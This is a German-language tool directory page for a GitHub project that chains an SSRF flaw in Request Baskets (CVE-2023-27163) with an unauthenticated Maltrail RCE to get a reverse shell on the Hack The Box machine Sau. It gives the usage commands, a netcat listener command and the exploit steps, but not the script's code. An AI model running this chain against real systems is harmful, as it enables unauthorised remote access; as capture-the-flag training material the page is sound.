Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
htb-sau-exploit-chain — Automatisierte Exploit-Kette für HTB Sau — CVE-2023-27163 (SSRF) + Maltrail nicht authentifizierte RCE → Reverse-Shell | Kitploit
Tools/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

Automatisierte Exploit-Kette für HTB Sau — CVE-2023-27163 (SSRF) + Maltrail nicht authentifizierte RCE → Reverse-Shell

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 MonatenNoch nicht geprüft

HTB Sau Exploit-Kette — CVE-2023-27163 (SSRF) + Maltrail-RCE-Automatisierung

Ein Python-Exploit-Skript, das CVE-2023-27163 (Server-Side Request Forgery in Request Baskets ≤ 1.2.1) mit einer nicht authentifizierten Remote-Code-Execution-Schwachstelle in Maltrail 0.53 verknüpft und eine Reverse Shell liefert. Entwickelt für die Hack-The-Box-Maschine Sau.


📌 Überblick

Dieses Skript automatisiert den Exploit-Ablauf, der erforderlich ist, um ersten Zugriff auf das Ziel zu erlangen:

  1. Ausnutzen von CVE-2023-27163, um einen nutzbaren Bucket-Endpunkt zu erhalten
  2. Nutzen des offengelegten Dienstes, um mit Maltrail zu interagieren
  3. Auslösen einer nicht authentifizierten RCE in Maltrail
  4. Zustellen einer Reverse Shell an die Angreifer-Maschine

⚙️ Verwendung

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Beispiel:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Netcat-Listener (Wichtig)

Starte vor der Ausführung des Exploits einen Listener auf deiner Maschine, um die Reverse Shell einzufangen:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

Beispiel:

root@kitploit:~
nc -lvnp 4444

🧩 Parameter

ParameterBeschreibung
TARGET_URLBasis-URL des Ziels (z. B. http://IP)
LISTENER_IPIP deiner Angreifer-Maschine
LISTENER_PORTPort zum Empfangen der Reverse Shell

🚀 Exploit-Ablauf

  • Ziel-URL normalisieren
  • CVE-2023-27163 auslösen, um einen Request-Basket zu erstellen/darauf zuzugreifen
  • Den zugänglichen Endpunkt extrahieren (bucket_url)
  • Den Bucket nutzen, um mit Maltrail zu interagieren
  • Payload ausführen, um eine Reverse Shell zu starten

⚠️ Hinweise

  • Stelle sicher, dass dein Listener vor der Ausführung des Skripts läuft
  • Entferne das abschließende / aus der Ziel-URL (wird im Skript automatisch behandelt)
  • Speziell für die HTB-Sau-Maschine entwickelt — möglicherweise nicht allgemein übertragbar

📚 Referenzen

  • CVE-2023-27163 (Request Baskets)
  • Maltrail – nicht authentifizierte RCE

🛑 Haftungsausschluss

Dieses Projekt ist für Bildungszwecke und die Verwendung in autorisierten Umgebungen wie Hack The Box gedacht. Verwende es nicht gegen Systeme ohne entsprechende Genehmigung.

Tool herunterladen